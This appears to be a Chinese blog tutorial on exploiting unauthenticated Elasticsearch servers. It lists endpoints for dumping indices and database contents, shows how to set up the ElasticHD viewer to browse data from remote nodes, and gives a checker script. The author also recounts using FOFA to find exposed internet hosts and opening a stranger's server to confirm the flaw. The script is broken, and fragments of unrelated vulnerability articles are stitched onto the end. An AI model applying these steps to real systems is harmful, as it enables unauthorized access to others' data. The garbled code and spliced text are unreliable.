Elasticsearch是一个开源的高扩展的分布式全文搜索引擎,他可以近乎实时的存储、检索数据,本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据,Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。

漏洞原理:Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。

一、本地漏洞验证

1.信息收集

nmap -sV 192.168

2.漏洞复现,

访问地址: http://192.168.20.68:9200/

二、外网探索漏洞

我用FOFA搜索开放了9200端口的IP,获得1,687,803条数据

随便打开一个ip的9200端口,发现存在漏洞

再使用nmap扫描一下ip,发现漏洞确实存在,而且看其他端口的服务,可能存在的漏洞还不少,今天就不探讨其他漏洞了。

三、信息查看

elasticsearch在安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://localhost:9200/ cat/indices里面的indices包含了 river一般就是安装了river了。

http://localhost:9200/rvier/search就可以查看敏感信息了
http://localhost:9200/_plugin/head/ web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/river/search 查看数据库敏感信息
http://localhost:9200/_nodes 查看节点数据

http:// localhost:9200/_cat/indices获取所有的index

http:// localhost:9200/_mapping?pretty=true 获取index下的所有type

http:// localhost:9200/pv_fun_all/school/_search?pretty=true 获取该index下该type下的内容

四、漏洞利用

3.1 还可以在kali中搭建ElasticHD,在浏览器中远程连接就可以看到ES节点服务器可视化数据的全貌了

下载地址:

https://github.com/360EntSecGroup-Skylar/ElasticHD/releases/download/1.4/elasticHD_linux_amd64.zip

1.可以下载好了再复制进kali,也可以直接在kali中下载

wget https://github.com/360EntSecGroup-Skylar/ElasticHD/releases/download/1.4/elasticHD_linux_amd64.zip

unzip elasticHD_linux_amd64.zip

3.加权限

chmod 777 ElasticHD

4.运行ElasticHD

exec ./ElasticHD -p 127.0.0.1:9801

我运行完命令,终端会自动关闭

5.打开浏览器访问 http://127.0.0.1:9801/

在浏览器中访问127.0.0.1:9801, 在下面输入需要探索的ip地址,然后点击connect就可以看到泄露的信息,点击模块Query还可以查看详细信息。

3.2  Python未授权访问脚本

#! /usr/bin/env python

* coding:utf-8 *

import requests

def Elasticsearch_check(ip, port=9200, timeout=5):

url = "http://"+ip+":"+str(port)+"/_cat"

response = requests.get(url)

except:

if "/_cat/master" in response.content:

print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port)

if name == 'main':

Elasticsearch_check("127.0.0.1")

五、加固方案

1、限制IP访问,绑定固定IP

2、在config/elasticsearch.yml中为9200端口设置认证:

http.basic.enabled true #开关,开启会接管全部HTTP连接

http.basic.user "admin" #账号

http.basic.password "admin_pw" #密码

http.basic.ipwhitelist ["localhost", "127.0.0.1"]

https://yq.aliyun.com/articles/616757

https://blog.csdn.net/qq_32393893/article/details/105387471 .

https://blog.csdn.net/qq_44108455/article/details/108102982?spm=1001.2101.3001.4242

本文仅限于大家技术交流和学习,严谨读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞支持一下。谢谢各位读者大老爷。

简述Elasticsearch是一个开源的高扩展的分布式全文搜索引擎,他可以近乎实时的存储、检索数据,本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据,Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。漏洞原理:Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。.
授权 的检查 扫描以下常见 授权 访问 redis、mongodb、memcached、 elasticsearch 、zookeeper、ftp、CouchDB、docker、Hadoop pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ python3 unauthorized-check.py url.txt
最近扫描一个内网的ip,发现有一个不常见的端口开着,服务是rpcbind,上网一查还真是有 漏洞 。 该 漏洞 可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。 nmap -sS -sV -T4 192.168.26.28 使用metasploit(msf)验证 漏洞 use auxiliary/scanner/misc/sunrpc_portmapper
1.FTP协议介绍 FTP,文件传输协议,是TCP/IP协议组中的协议之一属于传输层协议,由C/S(客户端/服务端)组成,默认情况下FTP协议使用TCP端口中的 20和21这两个端口。 在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 2.FTP匿名 漏洞 综述 目标开启了匿名FTP服务匿名FTP允许任意用户通过FTP来 访问 开放的目录和文件 恶意攻击者可以通过匿名FTP来 访问 开放的文件或目录来收集信息进.
Windows远程桌面服务远程执行代码 漏洞 (CVE-2019-0708) 漏洞 复现 1. 漏洞 介绍 此 漏洞 是预身份验证且无需用户交互,这就意味着这个 漏洞 可以通过网络蠕虫的方式被利用。利用此 漏洞 的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。该 漏洞 是2019年危害性最大的严重性 漏洞 (五十防火墙),该 漏洞 是通过windows的3389远程端口进行攻击的,被攻击的主机会造成蓝屏,也可能会反弹shell. 2. 漏洞 原理 CVE-2019-0708 漏洞 是通过检查用户的身份认证,导致可以绕过认证,不用任何的